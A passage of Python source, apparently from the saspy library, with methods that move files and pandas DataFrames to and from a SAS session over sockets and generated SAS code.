ll = self.submit("ods "+self.sascfg.output+" (id=saspy_internal) close;ods listing close;ods listing;libname work list;\n",'text')
break
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
return log
def saslog(self):
"""
this method is used to get the current, full contents of the SASLOG
"""
return self._log
def exist(self, table: str, libref: str ="") -> bool:
"""
table - the name of the SAS Data Set
libref - the libref for the Data Set, defaults to WORK, or USER if assigned
Returns True it the Data Set exists and False if it does not
"""
code = 'data _null_; e = exist("'
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"+'"'+");\n"
code += 'v = exist("'
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"+'"'+", 'VIEW');\n if e or v then e = 1;\n"
code += "put 'TABLE_EXISTS=' e 'TAB_EXTEND=';run;"
ll = self.submit(code, "text")
exists = int(ll['LOG'].rpartition("TABLE_EXISTS=")[2].rpartition(" TAB_EXTEND=")[0])
return bool(exists)
def read_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, opts: dict = None) -> '<SASdata object>':
"""
This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.
file - eithe the OS filesystem path of the file, or HTTP://... for a url accessible file
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
opts - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)
"""
opts = opts if opts is not None else {}
code = "filename x "
if file.lower().startswith("http"):
code += "url "
code += "\""+file+"\";\n"
code += "proc import datafile=x out="
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n dbms=csv replace; "+self._sb._impopts(opts)+" run;"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
def write_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, dsopts: dict = None, opts: dict = None) -> 'The LOG showing the results of the step':
"""
This method will export a SAS Data Set to a file in CSV format.
file - the OS filesystem path of the file to be created (exported from the SAS Data Set)
table - the name of the SAS Data Set you want to export to a CSV file
libref - the libref for the SAS Data Set.
dsopts - a dictionary containing any of the following SAS data set options(where, drop, keep, obs, firstobs)
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
"""
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
code = "filename x \""+file+"\";\n"
code += "options nosource;\n"
code += "proc export data="
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n "+self._sb._dsopts(dsopts)+" outfile=x dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "options source;\n"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
return ll['LOG']
def upload_slow(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
file saspydir;
infile datalines;
input;
lin = length(_infile_);
outdata = inputc(_infile_, '$hex.', lin);
lout = lin/2;
put outdata $varying80. lout;
datalines4;"""
buf = fd.read1(40)
if len(buf):
self._asubmit(code, "text")
else:
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
fid = fopen('saspydir', 'O');
if fid then
rc = fclose(fid);
run;\n"""
ll = self.submit(code, 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
while len(buf):
buf2 = ''
for i in range(len(buf)):
buf2 += '%02x' % buf[i]
self.stdin.write(buf2.encode()+b'\n')
buf = fd.read1(40)
self._asubmit(";;;;", "text")
ll = self.submit("run;\nfilename saspydir;", 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
port = self.sascfg.rtunnel
host = 'localhost'
else:
return self._upload_client(localfile, remotefile, overwrite, permission, **kwargs)
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=S lrecl=4096;
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
self._asubmit(code, "text")
sock = socks.socket()
sock.connect((host, port))
done = False
while not done:
try:
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = sock.send(buf[blen-send:blen])
except (BlockingIOError):
pass
except (OSError):
sock.close()
fd.close()
sock = socks.socket()
sock.connect((host, port))
fd = open(localfile, 'rb')
sleep(.5)
break
send -= sent
else:
done = True
sock.shutdown(socks.SHUT_RDWR)
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _upload_client(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
'LOG' : "Error try to open a socket in the upload method. Call failed."}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary lrecl=4096; */
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during upload. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = newsock[0].send(buf[blen-send:blen])
except (BlockingIOError):
pass
send -= sent
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):
"""
This method downloads a remote file from the SAS servers file system.
localfile - path to the local file to create or overwrite
remotefile - path to remote file tp dpwnload
overwrite - overwrite the output file if it exists?
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" does not exist."}
if valid == {}:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" is a directory."}
if os.path.isdir(localfile):
locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]
else:
locf = localfile
try:
fd = open(locf, 'wb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(locf)+" could not be opened. Error was: "+str(e)}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
'LOG' : "Error try to open a socket in the download method. Call failed."}
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
code = """
filename saspydir '"""+remotefile+"""' recfm=F encoding=binary lrecl=4096;
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary; */
data _null_;
file sock;
infile saspydir;
input;
put _infile_;
run;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during download. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in download.\n"+ll['LOG']}
datar = b''
newsock = (0,0)
try:
newsock = sock.accept()
while True:
data = newsock[0].recv(4096)
if len(data):
datar += data
else:
if len(datar):
fd.write(datar)
break
if len(datar) > 8300:
fd.write(datar[:8192])
datar = datar[8192:]
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.flush()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _getbytelenF(self, x):
return len(x.encode(self.sascfg.encoding))
def _getbytelenR(self, x):
return len(x.encode(self.sascfg.encoding, errors='replace'))
def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dtkeys = datetimes.keys()
fmtkeys = outfmts.keys()
labkeys = labels.keys()
if encode_errors is None:
encode_errors = 'fail'
if type(char_lengths) is not dict:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
charlens = {k.upper():v for k,v in charlens.items()}
if type(df.index) != pd.RangeIndex:
warnings.warn("Note that Indexes are not transferred over as columns. Only actual coulmns are transferred")
for name in df.columns:
colname = str(name)
input += "'"+colname+"'n "
if colname in labkeys:
label += "label '"+colname+"'n ="+labels[colname]+";\n"
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(charlens[colname.upper()])
except KeyError as e:
print("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if colname not in dtkeys:
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
else:
if datetimes[colname].lower() == 'date':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if datetimes[colname].lower() == 'time':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
print("invalid value for datetimes for column "+colname+". Using default.")
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
server = True
port = self.sascfg.rtunnel
host = 'localhost'
code = """filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=V termstr=LF;\n"""
else:
server = False
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError as e:
raise e
code = """filename sock socket '"""+host+""":"""+str(port)+"""' recfm=V termstr=LF;\n"""
code += "data "
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile sock nbyte=nb delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\nrun;\nfilename sock;\n"
if not server:
sock.listen(1)
self._asubmit(code, "text")
if server:
sleep(1)
sock = socks.socket()
sock.connect((host, port))
ssock = sock
if not server:
if sel.select([sock],[],[],10)[0] == []:
print("error occured in SAS during data transfer. Check the LOG for issues.")
sock.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("error occured in SAS during data transfer. Check the LOG for issues.")
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ssock = newsock[0]
logf = b''
first = True
fail = False
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
first = False
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
ll = self.submit("", 'text')
print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
if fail:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
fail = True
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
print('first')
if not first:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
first = False
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return None
def dataframe2sasdataORIG(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dtkeys = datetimes.keys()
fmtkeys = outfmts.keys()
labkeys = labels.keys()
if encode_errors is None:
encode_errors = 'fail'
bpc = self._sb.pyenc[0]
if char_lengths and str(char_lengths).strip() in ['1','2','3','4']:
bpc = int(char_lengths)
if char_lengths and str(char_lengths) == 'exact':
CnotB = False
else:
CnotB = bpc == 1
if type(char_lengths) is not dict:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
charlens = {k.upper():v for k,v in charlens.items()}
for name in df.columns:
colname = str(name)
input += "'"+colname+"'n "
if colname in labkeys:
label += "label '"+colname+"'n ="+labels[colname]+";\n"
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(charlens[colname.upper()])
except KeyError as e:
print("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if colname not in dtkeys:
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
else:
if datetimes[colname].lower() == 'date':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if datetimes[colname].lower() == 'time':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
print("invalid value for datetimes for column "+colname+". Using default.")
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
code = "data "
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile datalines delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\ndatalines4;"
self._asubmit(code, "text")
logf = b''
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
return None
def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ',
port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
rowsep - the row seperator character to use; defaults to '\x01'
colsep - the column seperator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
"""
dsopts = dsopts if dsopts is not None else {}
method = kwargs.pop('method', None)
if method and method.lower() == 'csv':
return self.sasdata2dataframeCSV(table, libref, dsopts, port=port, wait=wait, **kwargs)
elif method and method.lower() == 'disk':
return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,
rowrep, colrep, port=port, wait=wait, **kwargs)
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if self.sascfg.verbose:
if my_fmts != False:
print("'my_fmts=' is only used with the CSV or DISK version of this method. option ignored.")
if k_dts is not None:
print("'dtype=' is only used with the CSV or DISK version of this method. option ignored.")
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
datar = ""
if libref:
tabname = libref+".'"+table.strip()+"'n "
else:
tabname = "'"+table.strip()+"'n "
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
